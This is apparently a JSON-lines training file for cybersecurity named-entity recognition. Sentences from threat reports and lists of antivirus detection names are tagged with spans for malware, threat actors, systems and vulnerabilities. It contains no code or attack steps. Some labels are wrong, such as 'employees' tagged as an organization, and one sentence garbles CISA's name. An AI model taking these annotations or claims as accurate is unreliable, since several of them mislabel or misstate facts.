{"text": "A backdoor also known as: Virus.Win32.Plutor!O Worm.Plutor W32/Lutor.b Virus.W32.Plutor!c PE_PLUTOR.A Win32.Trojan.WisdomEyes.16070401.9500.9838 W32.Lutor PE_PLUTOR.A Win.Trojan.Win-25 Virus.Win32.Plutor.b Trojan.Win32.Plutor.cxgc BackDoor.Jeff Virus.Plutor.Win32.2 BehavesLike.Win32.Virus.bh Trojan-Dropper.Win32.Joiner W32/Trojan.RQNC-0214 TR/Win32.HDDKill Virus/Win32.Plutor Backdoor:Win32/Plutor.B Virus.Win32.Plutor.b Virus.Win32.Plutor.b W32/Plutor.B Win32/Plutor.B Win32.Virus.Plutor.Htby Worm.Plutor!yPZ/v8ChneU W32/Plutor.B Win32/Trojan.3db", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003937", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.Gamarue.29491 HT_GAMARUE_GI0705DA.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan3.FQX W32.Shadesrat HT_GAMARUE_GI0705DA.UVPM Trojan.Win32.Inject.bxpwvz W32.W.Palevo.lJR8 Trojan.DownLoader5.4594 Backdoor.DarkKomet.Win32.11962 W32/Trojan.FEOJ-4670 TR/Drop.Gamarue.J TrojanDropper:Win32/Gamarue.I Trojan.Symmi.D5EBC Backdoor/Win32.DarkKomet.R72424 SScope.Malware-Cryptor.Winlock.1513 Trojan.Injector!eYQevBEYEJs Trojan-PWS.Win32.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003939", "source": "cyner2_train"}}
{"text": "The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: employees": [[73, 82]], "ORGANIZATION: the banking sector": [[94, 112]]}, "info": {"id": "cyner2_train_003943", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Opus.175136 Trojan.Win32.Opus!O Trojan.Opus.Win32.6 Trojan/Opus.gd Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Opus-1 Trojan-Dropper.Win32.Dinwod.aeuh Trojan.Win32.Opus.iiuoo W32.W.AutoRun.l6Zu BehavesLike.Win32.Ransomware.ch Trojan.Win32.Opus Trojan/Opus.e Trojan/Win32.Opus Trojan.Zusy.D53A5 Trojan-Dropper.Win32.Dinwod.aeuh Trojan.Opus Win32/Swimnag.B Trojan.Opus!SLndS2cINJM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003944", "source": "cyner2_train"}}
{"text": "A backdoor also known as: not-a-virus:AdWare.Win32.BHO.bgvh Riskware.Win32.BHO.ewirij Adware.Spigot.139 ADWARE/BrowserIO.nylnh GrayWare[AdWare]/Win32.BHO Trojan.Razy.D36397 not-a-virus:AdWare.Win32.BHO.bgvh PUP.Optional.SearchBar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003946", "source": "cyner2_train"}}
{"text": "It has been operating since November 2016 at least.", "spans": {}, "info": {"id": "cyner2_train_003949", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Tandfuy Trojan.Symmi.DA610 BehavesLike.Win32.Dropper.lt Trojan-Downloader.Win32.Tandfuy W32/Trojan.ZKSQ-8249 TR/Bipamid.dnrhz TrojanDownloader:Win32/Tandfuy.B Trojan/Win32.AVKill.R107811 Trj/GdSda.A Win32/Bipamid.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003950", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Cuegoe.18812 Trojan.Dropper Win.Trojan.Cuegoe-6336261-0 Application.Win32.Amonetize.NE BehavesLike.Win32.BrowseFox.gc Trojan/Win32.Unknown Trojan.Zusy.D41B27 Trojan/Win32.Cuegoe.R208534 TrojanDropper.Cuegoe Win32/Trojan.85a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003951", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.VB.1 Trojan/W32.Cospet.81730 Trojan.Win32.Cospet!O TrojanPWS.VB.CX Trojan.Cospet.Win32.97 Backdoor.VB.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Spy.VB.NFL Backdoor.VB.1 Trojan.Win32.Cospet.ha Backdoor.VB.1 Trojan.Win32.Cospet.bjyzt Trojan.Win32.A.Cospet.81728[UPX] Troj.PSW32.W.QQPass.l9CX Backdoor.VB.1 TrojWare.Win32.Spy.VB.NFL0 Backdoor.VB.1 Win32.HLLW.Autoruner.46782 BehavesLike.Win32.Trojan.lc Trojan/Cospet.gz Trojan.Win32.Cospet Trojan/Cospet.av Trojan/Win32.Cospet Trojan/Win32.Cospet.R2764 Trojan.Win32.Cospet.ha Backdoor.VB.1 Trojan.Cospet!9xWgZWamXaI RAT.LostDoor W32/Cospet.HA!tr Win32/Backdoor.4a9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003952", "source": "cyner2_train"}}
{"text": "It uses a flash exploit that targets the recent vulnerability in Adobe flash.", "spans": {"VULNERABILITY: flash exploit": [[10, 23]], "VULNERABILITY: vulnerability": [[48, 61]], "SYSTEM: Adobe flash.": [[65, 77]]}, "info": {"id": "cyner2_train_003953", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Rootkit.TDss.F Win32.Trojan.WisdomEyes.16070401.9500.9996 Rootkit.TDss.F Packed.Win32.Krap.e Rootkit.TDss.F Rootkit.TDss.F Rootkit.TDss.F Win32.Troj.Krap.c.35328 Rootkit.TDss.F Packed.Win32.Krap.e Trojan/Win32.Alureon.R61580 Rootkit.TDss.F W32/PackTdss.Y!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003957", "source": "cyner2_train"}}
{"text": "Cybercriminals are cashing in on advertising and installing legitimate applications.", "spans": {"THREAT_ACTOR: Cybercriminals": [[0, 14]]}, "info": {"id": "cyner2_train_003959", "source": "cyner2_train"}}
{"text": "We analyze multiple versions of KeyBoy revealing a development cycle focused on avoiding basic antivirus detection.", "spans": {"MALWARE: KeyBoy": [[32, 38]], "SYSTEM: antivirus detection.": [[95, 115]]}, "info": {"id": "cyner2_train_003960", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba.be Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tinba.dqteol TrojWare.Win32.Roitamit.BE Trojan.PWS.Tinba.153 Trojan.Tinba.Win32.1916 TR/Crypt.ZPACK.137753 Trojan/Win32.Skeeyah.R216296 Trojan.Tinba Win32/Tinba.BE Trojan.Tinba!GN4G+jbMfD0 Trojan.Win32.Tinba W32/Tinba.BE!tr Win32/Trojan.6ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003961", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D167A7 Win32.Trojan.WisdomEyes.16070401.9500.9977 TrojWare.Win32.TrojanDownloader.Small.SGE Trojan.Yakes.uzd Trojan/Win32.Yakes.C2360515 Trojan.Yakes Win32.Trojan.Yakes.Pgcz Win32/Trojan.483", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003962", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesGNOLAH.Trojan Worm.Win32.VB!O Trojan.Jinra.A3 Worm.VB.Win32.2511 W32/VB.bem Win32.Worm.VB.kz W32.SillyFDC Win32/SillyAutorun.CKX WORM_VB.JSE Worm.Win32.VB.bem Trojan.Win32.VB.csfhed W32.W.VB.tnRc Win32.Worm.Vb.Szvd WORM_VB.JSE Worm/VB.pbz Worm/Win32.VB Worm:Win32/Jinra.A Trojan.Symmi.D5113 Worm.Win32.A.VB.184320 Worm.Win32.VB.bem Worm/Win32.VB.R125768 Trojan.VBRA.010736 Worm.Email Win32/VB.NUR Worm.VB!cXQoycDN5vU Worm.Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003964", "source": "cyner2_train"}}
{"text": "If the Trojan cannot find this file, it attempts to register itself in autorun.", "spans": {"MALWARE: Trojan": [[7, 13]]}, "info": {"id": "cyner2_train_003965", "source": "cyner2_train"}}
{"text": "Called HummingBad, this malware establishes a persistent rootkit with the objective to generate fraudulent ad revenue for its perpetrator, similar to the Brain Test app discovered by Check Point earlier this year.", "spans": {"MALWARE: HummingBad,": [[7, 18]], "MALWARE: malware": [[24, 31]], "MALWARE: rootkit": [[57, 64]], "ORGANIZATION: perpetrator,": [[126, 138]], "SYSTEM: Brain Test app": [[154, 168]], "ORGANIZATION: Check Point": [[183, 194]]}, "info": {"id": "cyner2_train_003967", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9564 Trojan.Razy.D37E6E TrojanDownloader:Win32/Aentdwn.B!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003968", "source": "cyner2_train"}}
{"text": "On Aug.23, 2016, FireEye detected a potentially new ATM malware sample that used some interesting techniques not seen before.", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "MALWARE: ATM malware": [[52, 63]]}, "info": {"id": "cyner2_train_003969", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JKVR Trojan.Win32.Scar!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Downloader-56615 Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Click2.2601 Trojan.Scar.Win32.55928 BehavesLike.Win32.Backdoor.kh Trojan.Win32.Scar TR/Dldr.Pingbed.A.33 TrojanDownloader:Win32/Pingbed.A Trojan.Scar Trojan.Downloader.JKVR W32/Nutiliers.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003971", "source": "cyner2_train"}}
{"text": "The FBI and Cuba's Infrastructure Security Agency CISA have issued a joint cybersecurity advisory, warning about the threat posed by Cuba's cyber actors and the #StopRansomware.", "spans": {"ORGANIZATION: The FBI": [[0, 7]], "ORGANIZATION: Cuba's Infrastructure Security Agency CISA": [[12, 54]], "MALWARE: threat": [[117, 123]], "THREAT_ACTOR: Cuba's cyber actors": [[133, 152]], "THREAT_ACTOR: the #StopRansomware.": [[157, 177]]}, "info": {"id": "cyner2_train_003974", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Win32/Jorik.KJ Trojan.Win32.Lofumin.exefpy Trojan.MulDrop7.58418 BehavesLike.Win32.Dropper.tc PUA.CoinMiner TR/AD.Lofumin.zzzlc Trojan:Win32/Lofumin.A Trojan.MulDrop Trj/CI.A BAT/CoinMiner.YC BAT/CoinMiner.YC!tr Win32/Trojan.9b2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003977", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.OG Win32.Sality.OG Trojan.Win32.Krap.1!O W32.Sality.R W32/Autorun.worm.zzh Trojan.Win32.AutoRun.wazcf W32.SillyFDC AutoRun.BI Win32/Sality.AA WORM_AUTORUN.SMZ Worm.Autorun-1783 Win32.Sality.OG Win32.Sality.L Virus.Win32.TuTu.A.200000 Win32.Sality.OG Win32.Sality.OG Win32.HLLW.Autoruner.6138 Virus.Sality.Win32.15 WORM_AUTORUN.SMZ BehavesLike.Win32.Sality.fm W32/Sality.AA Win32.Sality.ab.173464 Worm:Win32/Hikjav.A Win32/Kashu.B Win32.Sality.OG Virus.Win32.Sality.baka Virus.Win32.Heur W32/AutoRun.FT!tr Win32/Sality.AJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003979", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VotwupD.fam.Trojan Trojan.Downloader.JNGS Trojan.Win32.Krap.3!O Trojan.Bredolab.AA Trojan.LdPinch.Win32.14316 Trojan/PSW.LdPinch.apfl TROJ_BURNIX.SMEP Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.NKYP Trojan.Bubnix TROJ_BURNIX.SMEP Win.Trojan.Downloader-36570 Trojan.Downloader.JNGS Packed.Win32.Krap.ao Trojan.Downloader.JNGS Trojan.Win32.Krap.dccehe Troj.PSW32.W.LdPinch.apfl!c TrojWare.Win32.PkdKrap.AO Trojan.Downloader.JNGS Trojan.DownLoader1.19419 W32/Trojan.DTIT-2576 Trojan/PSW.LdPinch.wcs W32.Trojan.Trojan-Downloader.Ge Trojan[Packed]/Win32.Krap Trojan.Downloader.JNGS Packed.Win32.Krap.ao TrojanDownloader:Win32/Bubnix.A Win-Trojan/Bredolab.55808 Trojan-Downloader.Ver54 Trojan.Downloader.JNGS Trojan.Downloader.JNGS Trojan.Downloader Win32.Packed.Krap.Efao Trojan.DL.JNGS!S940SQYc1R4 W32/Krap.AON!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003980", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke/W32.BadJoke.63153 JOKE_BADGAME.A Joke.Badgame JOKE_BADGAME.A Win.Worm.BadGameA-1 Hoax.Win32.BadJoke.Badgame Riskware.Win32.Badgame.hxed Joke.Win32.FakeFormat.63153 Joke.Win32.BadGame Joke.BadGame W32/Joke.XWVG-6884 HackTool[Hoax]/Win32.Badgame Win32.Joke.Badgame.kcloud Hoax.W32.BadJoke.Badgame!c Hoax.Win32.BadJoke.Badgame Win-Joke/FFormat.63488 Win32.Trojan-psw.Badjoke.Apdb Joke.Badgame.A not-a-virus:BadJoke.Win32.Badgame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003981", "source": "cyner2_train"}}
{"text": "When we found the exploit it appeared to be under development and evidence suggests it was deployed in Georgia.", "spans": {"VULNERABILITY: exploit": [[18, 25]]}, "info": {"id": "cyner2_train_003982", "source": "cyner2_train"}}
{"text": "Dridex utilizes an improved version of GoZ's peer-to-peer architecture to protect its command-and-control C2 servers against detection by security researchers and law enforcement.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: GoZ's": [[39, 44]], "SYSTEM: peer-to-peer architecture": [[45, 70]], "ORGANIZATION: security researchers": [[138, 158]], "ORGANIZATION: law enforcement.": [[163, 179]]}, "info": {"id": "cyner2_train_003983", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VariantBarysR.Trojan Troj.Zeleffo.Sma!c TROJ_ZELEFFO.SMA Trojan.Win32.Nitol.115301 Trojan.Zeleffo.Win32.2 TROJ_ZELEFFO.SMA Trojan.Win32.Nitol Trojan:Win32/Nitol.C SScope.Trojan-Downloader.16517", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003984", "source": "cyner2_train"}}
{"text": "Latest Trickbot's module called shareDll32 used for malware spreading in network shares.", "spans": {"MALWARE: Trickbot's": [[7, 17]], "MALWARE: shareDll32": [[32, 42]], "MALWARE: malware": [[52, 59]], "SYSTEM: network shares.": [[73, 88]]}, "info": {"id": "cyner2_train_003985", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUA.Packed.ASPack Trojan/Win32.HDC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003988", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DoS.Doraah.A Trojan/W32.DoS.959488 Trojan.DoS.Doraah.A DoS.Doraah!A/vo/IPDx2c W32/Rado.A@bd Backdoor.Trojan Smalldoor.BASU DoS.Win32.Doraah Trojan.Win32.Doraah.dgjf Trojan.DoS.Doraah.A DoS.Win32.Doraah Trojan.DoS.Doraah.A BackDoor.IRC.Dostan Tool.Doraah.Win32.4 W32/Rado.SFME-6858 DDoS.Doraah DDOS/Doraah.A.1 HackTool[DoS]/Win32.Doraah Win32.Hack.Doraah.kcloud Win-Trojan/Doraah.959488 Trojan.DoS.Doraah.A Trojan.DoS.Doraah.A DoS.Doraah Win32/DoS.Doraah.A Win32.Trojan.Doraah.Egyh W32/Murscat.A!tr DoS.HX Trojan.Win32.Doraah.aa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003989", "source": "cyner2_train"}}
{"text": "The Tick group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years.", "spans": {"THREAT_ACTOR: The Tick group": [[0, 14]], "THREAT_ACTOR: cyber espionage": [[29, 44]], "ORGANIZATION: organizations": [[61, 74]]}, "info": {"id": "cyner2_train_003990", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.16032.D Trojan-PSW.Win32.Mapler!O PWS.OnLineGames.MY65 PWS-OnlineGames.lf Trojan/PSW.Mapler.vm Win32.Trojan-PSW.OLGames.bx HV_ONLINEGAMES_CI194C7D.RDXN Trojan.Win32.Mapler.tpzmc Trojan.Win32.PSWIGames.16032.G Trojan.NtRootKit.13695 Trojan.Mapler.Win32.112 PWS-OnlineGames.lf Trojan-PWS.OnlineGames Trojan/PSW.Mapler.fj Trojan[PSW]/Win32.Mapler PWS:WinNT/OnLineGames.E TrojanPSW.Mapler Win32/PSW.OnLineGames.QDG Trojan.PWS.Mapler!9tj8NfYyp+s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003992", "source": "cyner2_train"}}
{"text": "After encrypting popular file types with the AES-256 encryption algorithm, TeslaCrypt holds the files for a ransom of $250 to $1000.", "spans": {"MALWARE: TeslaCrypt": [[75, 85]]}, "info": {"id": "cyner2_train_003994", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Autoit.Stampado.A Trojan.Blocker.Win32.37081 Ransom_Stampado.R055C0DAS18 Trojan.Encoder.10337 Ransom_Stampado.R055C0DAS18 BehavesLike.Win32.Ransom.fc W32/Trojan.ULQL-2410 Ransom:Win32/Stampado.A Trojan/Win32.Blocker.C1763564 Worm.Win32.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003995", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.CVE-2016-0034 Trojan.Crypt.RV Exploit.CVE.Win32.1627 Trojan/Exploit.CVE-2016-0034.p Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Packed2.37654 W32/CVE160034.OKEY-4732 Exploit.CVE-2016-0034.d EXP/Silverlight.AN Trojan[Exploit]/Win32.CVE-2016-0034 Trojan/Win32.MSIL.C1374172 Exploit.CVE20160034 Trj/GdSda.A Win32/Exploit.CVE-2016-0034.P Exploit.CVE-2016-0034!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003996", "source": "cyner2_train"}}
{"text": "The first copying of the exploit code we spotted was from the Sundown exploit kit EK, followed closely by Magnitude and a resurgent KaiXin EK.", "spans": {"MALWARE: Sundown exploit kit EK,": [[62, 85]], "MALWARE: Magnitude": [[106, 115]], "MALWARE: resurgent KaiXin EK.": [[122, 142]]}, "info": {"id": "cyner2_train_004000", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Graybird Win.Trojan.HackersDoor-6351576-1 Backdoor:Win64/Hackdoor.A!dll Backdoor/Win32.Hackdoor.R28108 Trj/CI.A Win32/Backdoor.14f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004001", "source": "cyner2_train"}}
{"text": "Note that the affected sites have consistent followers given the nature of their content.", "spans": {}, "info": {"id": "cyner2_train_004003", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NTPacker Trojan.NTPacker Trojan.NTPacker Win32.Trojan.WisdomEyes.16070401.9500.9936 Bloodhound.NTPacker Win.Trojan.Hydraq-9 Packed.Win32.PolyCrypt.b Trojan.NTPacker Trojan.NTPacker TrojWare.Win32.TrojanDropper.ErPack Trojan.NTPacker BackDoor.Ser.4 Trojan/PSW.QQPass.fk TrojanDropper:Win32/MultiDropper.B Packed.Win32.PolyCrypt.b Trojan.NTPacker Trojan/Win32.Delf.R33596 TScope.Malware-Cryptor.SB Win32.Packed.Polycrypt.Lndy W32/PolyCrypt.B!tr Win32/Trojan.267", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004005", "source": "cyner2_train"}}
{"text": "IOCs for today Jaff ransomware run", "spans": {"MALWARE: Jaff ransomware": [[15, 30]]}, "info": {"id": "cyner2_train_004007", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mjaka.A4 TROJ_MJAKA.C Win32.Trojan.WisdomEyes.16070401.9500.9762 TROJ_MJAKA.C Trojan.Win32.FC.euumqd W32/Trojan.EEMC-0397 Trojan:MSIL/Mjaka.A Spyware.InfoStealer Trj/Mjaka.A Win32/Trojan.9a1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004008", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS.Exploit.ShellCode.c Backdoor.Chches PowerShell/Kryptik.A BKDR_ChChes.SMZJEA-A BKDR_ChChes.SMZJEA-A Trojan.UPLT-5 Trojan:Win32/Posploi.A JS.S.Exploit.121732 Trojan.Win32.Chches Win32/Trojan.76d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004013", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.Banker.902656.L Trojan.Win32.Malware.1 Win32/PSW.Delf.NUI Banker.FEDD Trojan-Banker.Win32.Banker.aqtj Win32.HLLM.Sowsat.92 Win32/SillyDl.PVN Backdoor.Win32.Rbot!IK Trojan-Banker.Win32.Banker.aqtj Backdoor.Win32.Rbot PSW.Delf.EFZ Trj/Banker.FWD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004014", "source": "cyner2_train"}}
{"text": "The attack exploited an Adobe Flash vulnerability that stems from the zero-day vulnerabilities exposed from this month's Hacking Team data breach.", "spans": {"VULNERABILITY: Adobe Flash vulnerability": [[24, 49]], "VULNERABILITY: zero-day vulnerabilities": [[70, 94]], "ORGANIZATION: Hacking Team": [[121, 133]]}, "info": {"id": "cyner2_train_004018", "source": "cyner2_train"}}
{"text": "In addition, our data showed that there had been a high volume of spam runs during the weekdays and then a decreased volume during the weekends.", "spans": {}, "info": {"id": "cyner2_train_004019", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader.CZH O97M.Downloader.DI W97M.Downloader.CZH W97M.Downloader.CZH W97M.Downloader.CZH W97M.Downloader.CZH HEUR_VBA.CN TrojanDownloader:W97M/Ursnif.A W97M.Downloader.CZH W97M.Downloader.CZH virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004020", "source": "cyner2_train"}}
{"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa Bank of America Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One® Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ mobi.societegenerale.mobile.lappli L ’ Appli Société Générale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data .", "spans": {"SYSTEM: Play Market": [[84, 95]], "SYSTEM: Banque": [[138, 144], [185, 191], [1018, 1024]], "SYSTEM: Chase Mobile": [[214, 226]], "SYSTEM: Fifth Third Mobile Banking": [[245, 271]], "SYSTEM: Connect for Hotmail": [[301, 320]], "SYSTEM: Gmail": [[343, 348]], "SYSTEM: imo": [[371, 374]], "SYSTEM: Bank of America Mobile Banking": [[418, 448]], "SYSTEM: Capital One® Mobile": [[530, 549]], "SYSTEM: mail": [[588, 592]], "SYSTEM: Microsoft Outlook": [[622, 639]], "SYSTEM: Snapchat": [[661, 669]], "SYSTEM: WeChat": [[685, 691]], "SYSTEM: Twitter": [[712, 719]], "ORGANIZATION: Uber": [[732, 736]], "SYSTEM: USAA Mobile": [[766, 777]], "SYSTEM: Viber": [[852, 857]], "SYSTEM: Wells Fargo Mobile": [[882, 900]], "SYSTEM: WhatsApp": [[914, 922]], "SYSTEM: Yahoo Mail": [[960, 970]], "SYSTEM: Ma Banque": [[1064, 1073]], "MALWARE: Triout": [[1267, 1273]], "SYSTEM: Android": [[1298, 1305]]}, "info": {"id": "cyner2_train_004021", "source": "cyner2_train"}}
{"text": "Developed by ksoft, Uploader! allows its user to upload files to the internet via FTP.", "spans": {"ORGANIZATION: ksoft,": [[13, 19]], "SYSTEM: Uploader!": [[20, 29]]}, "info": {"id": "cyner2_train_004022", "source": "cyner2_train"}}
{"text": "The modus operandi for all three investigations were very similar and appear to be a new Carbanak gang attack methodology, focused on the hospitality industry.", "spans": {"THREAT_ACTOR: Carbanak gang": [[89, 102]], "ORGANIZATION: hospitality industry.": [[138, 159]]}, "info": {"id": "cyner2_train_004025", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojWare.Win32.TrojanDownloader.Tibs.1 Riskware.PSWTool.Win32.IEPassView.m!IK not-a-virus:PSWTool.Win32.IEPassView.m", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004026", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Injector.Win32.400028 Trojan.Johnnie.D3FAD Trojan.Win32.Kovter.rky Trojan.Win32.Kovter.efkdwr Troj.Dropper.W32.Nail.ldEa Trojan.Kovter.297 PUA.Win32.Dlhelper Trojan.Kovter.axf Trojan:Win32/Kometage.A Trojan.Win32.Kovter.rky Trojan/Win32.Kovter.R186277 Trojan.Kovter Trojan.Kovter!DsLwWELZUiM W32/Injector.DDXC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004027", "source": "cyner2_train"}}
{"text": "So far, no AV has given any meaningful identification to this malware—it is detected under generic names.", "spans": {"SYSTEM: AV": [[11, 13]], "MALWARE: malware—it": [[62, 72]]}, "info": {"id": "cyner2_train_004029", "source": "cyner2_train"}}
{"text": "In early February 2015, Dell SecureWorks Counter Threat UnitTM CTU researchers investigated a new file-encrypting ransomware family named TeslaCrypt, which was distributed by the popular Angler browser exploit kit.", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[24, 78]], "MALWARE: file-encrypting ransomware family": [[98, 131]], "MALWARE: TeslaCrypt,": [[138, 149]], "MALWARE: Angler browser exploit kit.": [[187, 214]]}, "info": {"id": "cyner2_train_004030", "source": "cyner2_train"}}
{"text": "We believe that the main goal of attackers using these tools is cybersabotage.", "spans": {"THREAT_ACTOR: attackers": [[33, 42]], "MALWARE: tools": [[55, 60]], "THREAT_ACTOR: cybersabotage.": [[64, 78]]}, "info": {"id": "cyner2_train_004033", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9955 Win.Trojan.Alina-5 Trojan.Win32.Alinaos.ewvxne BehavesLike.Win32.Dropper.qc Trojan.Win32.Alinaos W32/Trojan.ZTVS-0655 TrojanSpy:Win32/Alinaos.G Trojan.Win32.Z.Alinaos.57344 Win32.Worm.Alinaos.C Trj/GdSda.A Win32/Trojan.3de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004034", "source": "cyner2_train"}}
{"text": "We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign, a campaign Unit 42 has been following since May 2016.", "spans": {"THREAT_ACTOR: the OilRig attack campaign,": [[114, 141]], "THREAT_ACTOR: campaign": [[144, 152]], "ORGANIZATION: Unit 42": [[153, 160]]}, "info": {"id": "cyner2_train_004035", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.DarkHotel.A5 Trojan/Inexsmar.b Win32.Trojan.WisdomEyes.16070401.9500.9940 W32/Trojan.WHDF-1534 Trojan.Munidub TROJ_ASRUEX.B Trojan.Win32.Zapchast.ahgo Trojan.Win32.Zapchast.eavzfr Troj.W32.Zapchast!c TrojWare.Win32.UMal.chn Trojan.Inexsmar.Win32.1 TROJ_ASRUEX.B BehavesLike.Win32.Downloader.th Trojan.Zapchast.x Trojan/Win32.Zapchast Trojan.Zusy.D2AD58 Trojan.Win32.Zapchast.ahgo Trojan/Win32.Asruex.R175438 Trojan.Zapchast.pk Trojan.Zapchast Trj/GdSda.A Win32/Inexsmar.B Trojan.Zapchast!JP2wAgi6V+c Trojan.Win32.Inexsmar Win32/Trojan.2cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004037", "source": "cyner2_train"}}
